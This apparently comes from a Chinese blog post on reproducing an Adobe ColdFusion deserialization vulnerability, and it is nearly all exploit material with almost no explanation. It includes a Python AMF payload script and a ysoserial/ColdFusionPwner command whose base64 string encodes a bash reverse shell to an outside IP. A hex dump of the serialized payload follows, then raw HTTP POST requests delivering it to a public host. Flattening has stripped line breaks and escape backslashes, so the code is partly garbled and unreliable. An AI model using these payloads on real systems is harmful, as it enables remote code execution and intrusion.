Adobe ColdFusion 反序列化漏洞复现踩坑

import structimport sysimport requestsif len(sys.argv) != 5:    print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"    quit()target_IP = sys.argv[1]target_port = sys.argv[2]callback_IP = sys.argv[3]callback_port = sys.argv[4]amf_payload = 'x00x03x00x00x00x01x00x00x00x00xffxffxffxffx11x0a' +               'x07x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP +               struct.pack('>I', int(callback_port)) +               'xf9x6ax76x7bx7cxdex68x4fx76xd8xaax3dx00x00x01x5bxb0x4cx1dx81x80x01x00';url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"headers = {'Content-Type': 'application/x-amf'}response = requests.post(url, headers=headers, data=amf_payload, verify=False)

(base) ➜  ColdFusion java -cp coldpwn.jar:yso.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}' poc.ser

(base) ➜xxd  poc.ser    00000000: 0003 0000 0001 0000 0000 0000 0001 110a  ................00000010: 0747 6f72 672e 6170 6163 6865 2e61 7869  .Gorg.apache.axi00000020: 7332 2e75 7469 6c2e 4d65 7461 4461 7461  s2.util.MetaData00000030: 456e 7472 797c 998b d2c6 4fb4 e300 0000  Entry|....O.....00000040: 0201 0000 000b 2aac ed00 0573 7200 176a  ......*....sr..j00000050: 6176 612e 7574 696c 2e50 7269 6f72 6974  ava.util.Priorit00000060: 7951 7565 7565 94da 30b4 fb3f 82b1 0300  yQueue..0..?....00000070: 0249 0004 7369 7a65 4c00 0a63 6f6d 7061  .I..sizeL..compa00000080: 7261 746f 7274 0016 4c6a 6176 612f 7574  ratort..Ljava/ut00000090: 696c 2f43 6f6d 7061 7261 746f 723b 7870  il/Comparator;xp000000a0: 0000 0002 7372 002b 6f72 672e 6170 6163  ....sr.+org.apac000000b0: 6865 2e63 6f6d 6d6f 6e73 2e62 6561 6e75  he.commons.beanu000000c0: 7469 6c73 2e42 6561 6e43 6f6d 7061 7261  tils.BeanCompara000000d0: 746f 72cf 8e01 82fe 4ef1 7e02 0002 4c00  tor.....N.~...L.000000e0: 0a63 6f6d 7061 7261 746f 7271 007e 0001  .comparatorq.~..000000f0: 4c00 0870 726f 7065 7274 7974 0012 4c6a  L..propertyt..Lj00000100: 6176 612f 6c61 6e67 2f53 7472 696e 673b  ava/lang/String;00000110: 7870 7372 003f 6f72 672e 6170 6163 6865  xpsr.?org.apache00000120: 2e63 6f6d 6d6f 6e73 2e63 6f6c 6c65 6374  .commons.collect00000130: 696f 6e73 2e63 6f6d 7061 7261 746f 7273  ions.comparators00000140: 2e43 6f6d 7061 7261 626c 6543 6f6d 7061  .ComparableCompa00000150: 7261 746f 72fb f499 25b8 6eb1 3702 0000  rator...%.n.7...00000160: 7870 7400 106f 7574 7075 7450 726f 7065  xpt..outputPrope00000170: 7274 6965 7377 0400 0000 0373 7200 3a63  rtiesw.....sr.:c00000180: 6f6d 2e73 756e 2e6f 7267 2e61 7061 6368  om.sun.org.apach00000190: 652e 7861 6c61 6e2e 696e 7465 726e 616c  e.xalan.internal000001a0: 2e78 736c 7463 2e74 7261 782e 5465 6d70  .xsltc.trax.Temp000001b0: 6c61 7465 7349 6d70 6c09 574f c16e acab  latesImpl.WO.n..000001c0: 3303 0006 4900 0d5f 696e 6465 6e74 4e75  3...I.._indentNu000001d0: 6d62 6572 4900 0e5f 7472 616e 736c 6574  mberI.._translet000001e0: 496e 6465 785b 000a 5f62 7974 6563 6f64  Index[.._bytecod000001f0: 6573 7400 035b 5b42 5b00 065f 636c 6173  est..[[B[.._clas00000200: 7374 0012 5b4c 6a61 7661 2f6c 616e 672f  st..[Ljava/lang/00000210: 436c 6173 733b 4c00 055f 6e61 6d65 7100  Class;L.._nameq.00000220: 7e00 044c 0011 5f6f 7574 7075 7450 726f  ~..L.._outputPro00000230: 7065 7274 6965 7374 0016 4c6a 6176 612f  pertiest..Ljava/00000240: 7574 696c 2f50 726f 7065 7274 6965 733b  util/Properties;00000250: 7870 0000 0000 ffff ffff 7572 0003 5b5b  xp........ur..[[00000260: 424b fd19 1567 67db 3702 0000 7870 0000  BK...gg.7...xp..00000270: 0002 7572 0002 5b42 acf3 17f8 0608 54e0  ..ur..[B......T.00000280: 0200 0078 7000 0006 f7ca feba be00 0000  ...xp...........00000290: 3200 390a 0003 0022 0700 3707 0025 0700  2.9...."..7..%..000002a0: 2601 0010 7365 7269 616c 5665 7273 696f  &...serialVersio000002b0: 6e55 4944 0100 014a 0100 0d43 6f6e 7374  nUID...J...Const000002c0: 616e 7456 616c 7565 05ad 2093 f391 ddef  antValue.. .....000002d0: 3e01 0006 3c69 6e69 743e 0100 0328 2956  >...<init>...()V000002e0: 0100 0443 6f64 6501 000f 4c69 6e65 4e75  ...Code...LineNu000002f0: 6d62 6572 5461 626c 6501 0012 4c6f 6361  mberTable...Loca00000300: 6c56 6172 6961 626c 6554 6162 6c65 0100  lVariableTable..00000310: 0474 6869 7301 0013 5374 7562 5472 616e  .this...StubTran00000320: 736c 6574 5061 796c 6f61 6401 000c 496e  sletPayload...In00000330: 6e65 7243 6c61 7373 6573 0100 354c 7973  nerClasses..5Lys00000340: 6f73 6572 6961 6c2f 7061 796c 6f61 6473  oserial/payloads00000350: 2f75 7469 6c2f 4761 6467 6574 7324 5374  /util/Gadgets$St00000360: 7562 5472 616e 736c 6574 5061 796c 6f61  ubTransletPayloa00000370: 643b 0100 0974 7261 6e73 666f 726d 0100  d;...transform..00000380: 7228 4c63 6f6d 2f73 756e 2f6f 7267 2f61  r(Lcom/sun/org/a00000390: 7061 6368 652f 7861 6c61 6e2f 696e 7465  pache/xalan/inte000003a0: 726e 616c 2f78 736c 7463 2f44 4f4d 3b5b  rnal/xsltc/DOM;[000003b0: 4c63 6f6d 2f73 756e 2f6f 7267 2f61 7061  Lcom/sun/org/apa000003c0: 6368 652f 786d 6c2f 696e 7465 726e 616c  che/xml/internal000003d0: 2f73 6572 6961 6c69 7a65 722f 5365 7269  /serializer/Seri000003e0: 616c 697a 6174 696f 6e48 616e 646c 6572  alizationHandler000003f0: 3b29 5601 0008 646f 6375 6d65 6e74 0100  ;)V...document..00000400: 2d4c 636f 6d2f 7375 6e2f 6f72 672f 6170  -Lcom/sun/org/ap00000410: 6163 6865 2f78 616c 616e 2f69 6e74 6572  ache/xalan/inter00000420: 6e61 6c2f 7873 6c74 632f 444f 4d3b 0100  nal/xsltc/DOM;..00000430: 0868 616e 646c 6572 7301 0042 5b4c 636f  .handlers..B[Lco00000440: 6d2f 7375 6e2f 6f72 672f 6170 6163 6865  m/sun/org/apache00000450: 2f78 6d6c 2f69 6e74 6572 6e61 6c2f 7365  /xml/internal/se00000460: 7269 616c 697a 6572 2f53 6572 6961 6c69  rializer/Seriali00000470: 7a61 7469 6f6e 4861 6e64 6c65 723b 0100  zationHandler;..00000480: 0a45 7863 6570 7469 6f6e 7307 0027 0100  .Exceptions..'..00000490: a628 4c63 6f6d 2f73 756e 2f6f 7267 2f61  .(Lcom/sun/org/a000004a0: 7061 6368 652f 7861 6c61 6e2f 696e 7465  pache/xalan/inte000004b0: 726e 616c 2f78 736c 7463 2f44 4f4d 3b4c  rnal/xsltc/DOM;L000004c0: 636f 6d2f 7375 6e2f 6f72 672f 6170 6163  com/sun/org/apac000004d0: 6865 2f78 6d6c 2f69 6e74 6572 6e61 6c2f  he/xml/internal/000004e0: 6474 6d2f 4454 4d41 7869 7349 7465 7261  dtm/DTMAxisItera000004f0: 746f 723b 4c63 6f6d 2f73 756e 2f6f 7267  tor;Lcom/sun/org00000500: 2f61 7061 6368 652f 786d 6c2f 696e 7465  /apache/xml/inte00000510: 726e 616c 2f73 6572 6961 6c69 7a65 722f  rnal/serializer/00000520: 5365 7269 616c 697a 6174 696f 6e48 616e  SerializationHan00000530: 646c 6572 3b29 5601 0008 6974 6572 6174  dler;)V...iterat00000540: 6f72 0100 354c 636f 6d2f 7375 6e2f 6f72  or..5Lcom/sun/or00000550: 672f 6170 6163 6865 2f78 6d6c 2f69 6e74  g/apache/xml/int00000560: 6572 6e61 6c2f 6474 6d2f 4454 4d41 7869  ernal/dtm/DTMAxi00000570: 7349 7465 7261 746f 723b 0100 0768 616e  sIterator;...han00000580: 646c 6572 0100 414c 636f 6d2f 7375 6e2f  dler..ALcom/sun/00000590: 6f72 672f 6170 6163 6865 2f78 6d6c 2f69  org/apache/xml/i000005a0: 6e74 6572 6e61 6c2f 7365 7269 616c 697a  nternal/serializ000005b0: 6572 2f53 6572 6961 6c69 7a61 7469 6f6e  er/Serialization000005c0: 4861 6e64 6c65 723b 0100 0a53 6f75 7263  Handler;...Sourc000005d0: 6546 696c 6501 000c 4761 6467 6574 732e  eFile...Gadgets.000005e0: 6a61 7661 0c00 0a00 0b07 0028 0100 3379  java.......(..3y000005f0: 736f 7365 7269 616c 2f70 6179 6c6f 6164  soserial/payload00000600: 732f 7574 696c 2f47 6164 6765 7473 2453  s/util/Gadgets$S00000610: 7475 6254 7261 6e73 6c65 7450 6179 6c6f  tubTransletPaylo00000620: 6164 0100 4063 6f6d 2f73 756e 2f6f 7267  ad..@com/sun/org00000630: 2f61 7061 6368 652f 7861 6c61 6e2f 696e  /apache/xalan/in00000640: 7465 726e 616c 2f78 736c 7463 2f72 756e  ternal/xsltc/run00000650: 7469 6d65 2f41 6273 7472 6163 7454 7261  time/AbstractTra00000660: 6e73 6c65 7401 0014 6a61 7661 2f69 6f2f  nslet...java/io/00000670: 5365 7269 616c 697a 6162 6c65 0100 3963  Serializable..9c00000680: 6f6d 2f73 756e 2f6f 7267 2f61 7061 6368  om/sun/org/apach00000690: 652f 7861 6c61 6e2f 696e 7465 726e 616c  e/xalan/internal000006a0: 2f78 736c 7463 2f54 7261 6e73 6c65 7445  /xsltc/TransletE000006b0: 7863 6570 7469 6f6e 0100 1f79 736f 7365  xception...ysose000006c0: 7269 616c 2f70 6179 6c6f 6164 732f 7574  rial/payloads/ut000006d0: 696c 2f47 6164 6765 7473 0100 083c 636c  il/Gadgets...<cl000006e0: 696e 6974 3e01 0011 6a61 7661 2f6c 616e  init>...java/lan000006f0: 672f 5275 6e74 696d 6507 002a 0100 0a67  g/Runtime..*...g00000700: 6574 5275 6e74 696d 6501 0015 2829 4c6a  etRuntime...()Lj00000710: 6176 612f 6c61 6e67 2f52 756e 7469 6d65  ava/lang/Runtime00000720: 3b0c 002c 002d 0a00 2b00 2e01 0061 6261  ;..,.-..+....aba00000730: 7368 202d 6320 7b65 6368 6f2c 596d 467a  sh -c {echo,YmFz00000740: 6143 4174 6153 412b 4a69 4176 5a47 5632  aCAtaSA+JiAvZGV200000750: 4c33 526a 6343 3878 4d54 6775 4d54 6b77  L3RjcC8xMTguMTkw00000760: 4c6a 6b33 4c6a 4535 4c7a 6778 4f44 4567  Ljk3LjE5LzgxODEg00000770: 4d44 346d 4d51 3d3d 7d7c 7b62 6173 6536  MD4mMQ==}|{base600000780: 342c 2d64 7d7c 7b62 6173 682c 2d69 7d08  4,-d}|{bash,-i}.00000790: 0030 0100 0465 7865 6301 0027 284c 6a61  .0...exec..'(Lja000007a0: 7661 2f6c 616e 672f 5374 7269 6e67 3b29  va/lang/String;)000007b0: 4c6a 6176 612f 6c61 6e67 2f50 726f 6365  Ljava/lang/Proce000007c0: 7373 3b0c 0032 0033 0a00 2b00 3401 000d  ss;..2.3..+.4...000007d0: 5374 6163 6b4d 6170 5461 626c 6501 001e  StackMapTable...000007e0: 7973 6f73 6572 6961 6c2f 5077 6e65 7231  ysoserial/Pwner1000007f0: 3732 3039 3430 3734 3633 3439 3830 0100  72094074634980..00000800: 204c 7973 6f73 6572 6961 6c2f 5077 6e65   Lysoserial/Pwne00000810: 7231 3732 3039 3430 3734 3633 3439 3830  r17209407463498000000820: 3b00 2100 0200 0300 0100 0400 0100 1a00  ;.!.............00000830: 0500 0600 0100 0700 0000 0200 0800 0400  ................00000840: 0100 0a00 0b00 0100 0c00 0000 2f00 0100  ............/...00000850: 0100 0000 052a b700 01b1 0000 0002 000d  .....*..........00000860: 0000 0006 0001 0000 002f 000e 0000 000c  ........./......00000870: 0001 0000 0005 000f 0038 0000 0001 0013  .........8......00000880: 0014 0002 000c 0000 003f 0000 0003 0000  .........?......00000890: 0001 b100 0000 0200 0d00 0000 0600 0100  ................000008a0: 0000 3300 0e00 0000 2000 0300 0000 0100  ..3..... .......000008b0: 0f00 3800 0000 0000 0100 1500 1600 0100  ..8.............000008c0: 0000 0100 1700 1800 0200 1900 0000 0400  ................000008d0: 0100 1a00 0100 1300 1b00 0200 0c00 0000  ................000008e0: 4900 0000 0400 0000 01b1 0000 0002 000d  I...............000008f0: 0000 0006 0001 0000 0036 000e 0000 002a  .........6.....*00000900: 0004 0000 0001 000f 0038 0000 0000 0001  .........8......00000910: 0015 0016 0001 0000 0001 001c 001d 0002  ................00000920: 0000 0001 001e 001f 0003 0019 0000 0004  ................00000930: 0001 001a 0008 0029 000b 0001 000c 0000  .......)........00000940: 0024 0003 0002 0000 000f a700 0301 4cb8  .$............L.00000950: 002f 1231 b600 3557 b100 0000 0100 3600  ./.1..5W......6.00000960: 0000 0300 0103 0002 0020 0000 0002 0021  ......... .....!00000970: 0011 0000 000a 0001 0002 0023 0010 0009  ...........#....00000980: 7571 007e 0010 0000 01d4 cafe babe 0000  uq.~............00000990: 0032 001b 0a00 0300 1507 0017 0700 1807  .2..............000009a0: 0019 0100 1073 6572 6961 6c56 6572 7369  .....serialVersi000009b0: 6f6e 5549 4401 0001 4a01 000d 436f 6e73  onUID...J...Cons000009c0: 7461 6e74 5661 6c75 6505 71e6 69ee 3c6d  tantValue.q.i.<m000009d0: 4718 0100 063c 696e 6974 3e01 0003 2829  G....<init>...()000009e0: 5601 0004 436f 6465 0100 0f4c 696e 654e  V...Code...LineN000009f0: 756d 6265 7254 6162 6c65 0100 124c 6f63  umberTable...Loc00000a00: 616c 5661 7269 6162 6c65 5461 626c 6501  alVariableTable.00000a10: 0004 7468 6973 0100 0346 6f6f 0100 0c49  ..this...Foo...I00000a20: 6e6e 6572 436c 6173 7365 7301 0025 4c79  nnerClasses..%Ly00000a30: 736f 7365 7269 616c 2f70 6179 6c6f 6164  soserial/payload00000a40: 732f 7574 696c 2f47 6164 6765 7473 2446  s/util/Gadgets$F00000a50: 6f6f 3b01 000a 536f 7572 6365 4669 6c65  oo;...SourceFile00000a60: 0100 0c47 6164 6765 7473 2e6a 6176 610c  ...Gadgets.java.00000a70: 000a 000b 0700 1a01 0023 7973 6f73 6572  .........#ysoser00000a80: 6961 6c2f 7061 796c 6f61 6473 2f75 7469  ial/payloads/uti00000a90: 6c2f 4761 6467 6574 7324 466f 6f01 0010  l/Gadgets$Foo...00000aa0: 6a61 7661 2f6c 616e 672f 4f62 6a65 6374  java/lang/Object00000ab0: 0100 146a 6176 612f 696f 2f53 6572 6961  ...java/io/Seria00000ac0: 6c69 7a61 626c 6501 001f 7973 6f73 6572  lizable...ysoser00000ad0: 6961 6c2f 7061 796c 6f61 6473 2f75 7469  ial/payloads/uti00000ae0: 6c2f 4761 6467 6574 7300 2100 0200 0300  l/Gadgets.!.....00000af0: 0100 0400 0100 1a00 0500 0600 0100 0700  ................00000b00: 0000 0200 0800 0100 0100 0a00 0b00 0100  ................00000b10: 0c00 0000 2f00 0100 0100 0000 052a b700  ..../........*..00000b20: 01b1 0000 0002 000d 0000 0006 0001 0000  ................00000b30: 003a 000e 0000 000c 0001 0000 0005 000f  .:..............00000b40: 0012 0000 0002 0013 0000 0002 0014 0011  ................00000b50: 0000 000a 0001 0002 0016 0010 0009 7074  ..............pt00000b60: 0004 5077 6e72 7077 0100 7871 007e 000d  ..Pwnrpw..xq.~..00000b70: 7801 0101                                x...

POST /flex2gateway/amf HTTP/1.1Host: 60.205.212.75:8006Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Connection: closeContent-Type: application/x-amfContent-Length: 3003x00x03x00x00x00x01x00x00x00x00xffxffxffxffx11x0aGorg.apache.axis2.util.MetaDataEntry|™‹ÒÆO´ã*¬ísrjava.util.PriorityQueue”Ú0´û?‚±IsizeLcomparatortLjava/util/Comparator;xpsr+org.apache.commons.beanutils.BeanComparatorώ‚þNñ~Lcomparatorq~LpropertytLjava/lang/String;xpsr?org.apache.commons.collections.comparators.ComparableComparatorûô™%¸n±7xptoutputPropertieswsr:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl  WOÁn¬«3I_indentNumberI_transletIndex[_bytecodest[[B[_classt[Ljava/lang/Class;L_nameq~L_outputPropertiestLjava/util/Properties;xpÿÿÿÿur[[BKýggÛ7xpur[B¬óøTàxp÷Êþº¾29"7%&serialVersionUIDJConstantValue­ “ó‘Ýï><init>()VCodeLineNumberTableLocalVariableTablethisStubTransletPayloadInnerClasses5Lysoserial/payloads/util/Gadgets$StubTransletPayload;  transformr(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Vdocument-Lcom/sun/org/apache/xalan/internal/xsltc/DOM;handlersB[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;Exceptions'¦(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Viterator5Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;handlerALcom/sun/org/apache/xml/internal/serializer/SerializationHandler;SourceFileGadgets.java(3ysoserial/payloads/util/Gadgets$StubTransletPayload@com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTransletjava/io/Serializable9com/sun/org/apache/xalan/internal/xsltc/TransletExceptionysoserial/payloads/util/Gadgets<clinit>java/lang/Runtime*getRuntime()Ljava/lang/Runtime;,-+.abash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}0exec'(Ljava/lang/String;)Ljava/lang/Process;23+4StackMapTableysoserial/Pwner172094074634980 Lysoserial/Pwner172094074634980;!/*·±/8?±3 8I±6*8)$§L¸/1¶5W±6 !#  uq~ÔÊþº¾2serialVersionUIDJConstantValueqæiî<mG<init>()VCodeLineNumberTableLocalVariableTablethisFooInnerClasses%Lysoserial/payloads/util/Gadgets$Foo;SourceFileGadgets.java#ysoserial/payloads/util/Gadgets$Foojava/lang/Objectjava/io/Serializableysoserial/payloads/util/Gadgets!/*·±:  ptPwnrpwxq~x

POST /flex2gateway/amf HTTP/1.1Content-Type: application/x-amfUser-Agent: PostmanRuntime/7.28.4Accept: */*Postman-Token: e6337283-3d4b-4ffb-bec0-b7f5d6575345Host: 60.205.212.75:8006Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=21449A61E070DA3C42D224ED7EBF1F33.cfusionContent-Length: 2932Gorg.apache.axis2.util.MetaDataEntry|����O��*��srjava.util.PriorityQueue��0��?��IsizeLcomparatortLjava/util/Comparator;xpsr+org.apache.commons.beanutils.BeanComparatorώ��N�~Lcomparatorq~LpropertytLjava/lang/String;xpsr?org.apache.commons.collections.comparators.ComparableComparator���%�n�7xptoutputPropertieswsr:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl  WO�n��3I_indentNumberI_transletIndex[_bytecodest[[B[_classt[Ljava/lang/Class;L_nameq~L_outputPropertiestLjava/util/Properties;xp����ur[[BK�gg�7xpur[B���T�xp�����29"7%&serialVersionUIDJConstantValue� ����><init>()VCodeLineNumberTableLocalVariableTablethisStubTransletPayloadInnerClasses5Lysoserial/payloads/util/Gadgets$StubTransletPayload;  transformr(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Vdocument-Lcom/sun/org/apache/xalan/internal/xsltc/DOM;handlersB[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;Exceptions'�(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Viterator5Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;handlerALcom/sun/org/apache/xml/internal/serializer/SerializationHandler;SourceFileGadgets.java(3ysoserial/payloads/util/Gadgets$StubTransletPayload@com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTransletjava/io/Serializable9com/sun/org/apache/xalan/internal/xsltc/TransletExceptionysoserial/payloads/util/Gadgets<clinit>java/lang/Runtime*getRuntime()Ljava/lang/Runtime;,-+.abash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}0exec'(Ljava/lang/String;)Ljava/lang/Process;23+4StackMapTableysoserial/Pwner172094074634980 Lysoserial/Pwner172094074634980;!/*��/8?�3 8I�6*8)$�L�/1�5W�6 !#  uq~�����2serialVersionUIDJConstantValueq�i�<mG<init>()VCodeLineNumberTableLocalVariableTablethisFooInnerClasses%Lysoserial/payloads/util/Gadgets$Foo;SourceFileGadgets.java#ysoserial/payloads/util/Gadgets$Foojava/lang/Objectjava/io/Serializableysoserial/payloads/util/Gadgets!/*��:  ptPwnrpwxq~x